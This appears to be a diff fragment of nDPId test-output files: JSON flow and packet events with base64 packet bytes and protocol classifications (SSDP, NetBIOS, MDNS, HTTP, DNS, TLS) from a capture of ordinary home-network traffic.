00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":716,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269716,"flow_last_seen":1569687269716,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687269716,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":49816,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
01132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":716,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1569687269716,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":556,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":556,"pkt_l4_len":522,"thread_ts_msec":1569687269716,"pkt":"NDY7z3UopHczjPFACABFAAIeAABAAEARI1gKAACVCgAA48KY4MsCCjHASFRUUC8xLjEgMjAwIE9LDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTE4MDANCkRBVEU6IFNhdCwgMjggU2VwIDIwMTkgMTY6MTQ6MjkgR01UDQpFWFQ6DQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNDk6ODAwOC9zc2RwL2RldmljZS1kZXNjLnhtbA0KT1BUOiAiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzogYjNiMTBmNmEtMWRkMS0xMWIyLWI3NDAtYWU5NDc5MzlkMzA4DQpTRVJWRVI6IExpbnV4LzMuOC4xMyssIFVQblAvMS4wLCBQb3J0YWJsZSBTREsgZm9yIFVQblAgZGV2aWNlcy8xLjYuMTgNClgtVXNlci1BZ2VudDogcmVkc29uaWMNClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDo3OWQ4OGU4My03MjVjLWI3MWItYmFkMC01ODYyZDViMjIzODY6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KQk9PVElELlVQTlAuT1JHOiA0NzINCkNPTkZJR0lELlVQTlAuT1JHOiAxDQoNCg=="}
@@ -303,7 +303,7 @@
00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1797,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687277139,"flow_last_seen":1569687277139,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1569687277139,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1798,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1569687277144,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1569687277144,"pkt":"\/\/\/\/\/\/\/\/NDY7z3UoCABFAABOK\/AAAEAROM4KAADjCgAA\/wCJAIkAOvmHRYABEAABAAAAAAAAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAAAgAAE="}
00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1809,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1569687277188,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1569687277188,"pkt":"\/\/\/\/\/\/\/\/NDY7z3UoCABFAABgQ9oAAEARINIKAADjCgAA\/wCJAIkATMRRRYEwEAABAAAAAAABIEVNRkFDTkVDREFERUREREFERkREQ05GSERIREdERUFBAAAgAAHADAAgAAEAAAAAAAZgAAoAAOM="}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1569687281158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687281158,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0UBJAAPMGvOUIJWfECgAA4wG73ieGjW4CDCXQ8YARTdYkXAAAAQEICnincgAcDdF\/"}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1569687281158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687281158,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0UBJAAPMGvOUIJWfECgAA4wG73ieGjW4CDCXQ8YARTdYkXAAAAQEICnincgAcDdF\/"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2587,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687286917,"flow_last_seen":1569687286917,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687286917,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2587,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1569687286917,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687286917,"pkt":"AQBeAAD7pHczjPFACABFAABEAABAAP8RkBgKAACV4AAA+xTpFOkAMI4UAAAAAAABAAAAAAAAC19nb29nbGV6b25lBF90Y3AFbG9jYWwAAAwAAQ=="}
00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2587,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687286917,"flow_last_seen":1569687286917,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687286917,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlezone._tcp.local"}}
@@ -315,19 +315,19 @@
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2723,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1569687287737,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":16,"thread_ts_msec":1569687287737,"pkt":"AQBeAAABLH6BsEqhCABFwAAkGHoAAAEBtp0KAAAB4AAAAQkA5rYBAgVGCgAAAQAAAAAAAP\/\/Aiw="}
00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2723,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687287737,"flow_last_seen":1569687287737,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1569687287737,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":1.061278}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569687268559,"flow_last_seen":1569687271560,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":57547,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1569687249612,"flow_last_seen":1569687268122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":384,"flow_tot_l4_payload_len":3455,"flow_avg_l4_payload_len":181,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"}}
00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687240992,"flow_last_seen":1569687241009,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.53","src_port":56885,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687240992,"flow_last_seen":1569687241009,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.53","src_port":56885,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1569687249612,"flow_last_seen":1569687268122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":384,"flow_tot_l4_payload_len":3455,"flow_avg_l4_payload_len":181,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"}}
00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687240992,"flow_last_seen":1569687241009,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.53","src_port":56885,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687240992,"flow_last_seen":1569687241009,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.53","src_port":56885,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569687269223,"flow_last_seen":1569687272080,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":1244,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1569687249612,"flow_last_seen":1569687268086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":384,"flow_tot_l4_payload_len":1372,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"}}
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1569687249612,"flow_last_seen":1569687268086,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":384,"flow_tot_l4_payload_len":1372,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"}}
00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687287737,"flow_last_seen":1569687287737,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246982,"flow_last_seen":1569687260293,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246982,"flow_last_seen":1569687260293,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.2","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687241657,"flow_last_seen":1569687241657,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687241452,"flow_last_seen":1569687241452,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1569687277139,"flow_last_seen":1569687283186,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":912,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260469,"flow_last_seen":1569687260521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}}
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260469,"flow_last_seen":1569687260521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260469,"flow_last_seen":1569687260521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}}
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260469,"flow_last_seen":1569687260521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687260751,"flow_last_seen":1569687260767,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687271764,"flow_last_seen":1569687271764,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":51382,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687251177,"flow_last_seen":1569687251230,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
@@ -335,8 +335,8 @@
00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246891,"flow_last_seen":1569687246924,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261035,"flow_last_seen":1569687261054,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687245251,"flow_last_seen":1569687245288,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267677,"flow_last_seen":1569687268288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267677,"flow_last_seen":1569687268288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267677,"flow_last_seen":1569687268288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
